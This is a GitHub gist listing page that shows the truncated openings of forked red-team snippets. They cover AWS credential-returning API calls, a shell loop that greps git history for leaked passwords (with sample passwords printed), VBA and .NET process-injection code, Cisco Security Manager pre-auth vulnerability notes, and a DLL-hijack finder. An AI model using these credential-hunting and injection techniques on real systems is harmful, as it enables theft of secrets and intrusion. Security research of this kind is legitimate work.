Skip to content

Instantly share code, notes, and snippets.

View fuckup1337's full-sized avatar

fuckup fuckup1337

18 followers · 6 following
View GitHub Profile
@fuckup1337
fuckup1337 / AWS API calls that return credentials.md
Created February 20, 2021 18:59 — forked from kmcquade/AWS API calls that return credentials.md
AWS API calls that return credentials
@fuckup1337
fuckup1337 / JavascriptRecon.md
Created January 18, 2021 20:02
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@fuckup1337
fuckup1337 / Git Creds.md
Created January 8, 2021 00:59 — forked from int0x80/Git Creds.md

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...
@fuckup1337
fuckup1337 / functioninjection.vba
Created December 23, 2020 00:31 — forked from rmdavy/functioninjection.vba
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Const CC_STDCALL = 4
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long
@fuckup1337
fuckup1337 / DInjectQueuerAPC.cs
Created December 21, 2020 13:05 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@fuckup1337
fuckup1337 / mscorlib_load_assembly.vba
Created November 29, 2020 00:00 — forked from monoxgas/mscorlib_load_assembly.vba
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&
@fuckup1337
fuckup1337 / Jenkinsfile
Created November 20, 2020 21:05 — forked from HarmJ0y/Jenkinsfile
Rubeus Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL: https://github.com/GhostPack/Seatbelt
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = "https://github.com/GhostPack/Seatbelt"
@fuckup1337
fuckup1337 / CSM_pocs.md
Created November 17, 2020 22:24 — forked from Frycos/CSM_pocs.md

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

@fuckup1337
fuckup1337 / oplog-sync.cna
Created October 9, 2020 16:00 — forked from hotnops/oplog-sync.cna
import java.io.DataOutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
sub oplog::saveToDisk {
local('$timestamp $localIP $destIP $userContext $command $operator $oplog_id $logfile $data $header $handle $error');
$timestamp = $1;
$localIP = $2;
$destIP = $3;
$userContext = $4;
@fuckup1337
fuckup1337 / Get-PotentialDLLHijack.ps1
Created October 7, 2020 22:08 — forked from slyd0g/Get-PotentialDLLHijack.ps1
#Get-PotentialDLLHijack -CSVPath .\Logfile.CSV -MaliciousDLLPath .\DLLHijackTest.dll -ProcessPath "C:\Users\John\AppData\Local\Programs\Microsoft VS Code\Code.exe"
function Get-PotentialDLLHijack {
param (
[String]
$CSVPath = "",
[String]
$MaliciousDLLPath = "",
[String]
$ProcessPath = "",
[String]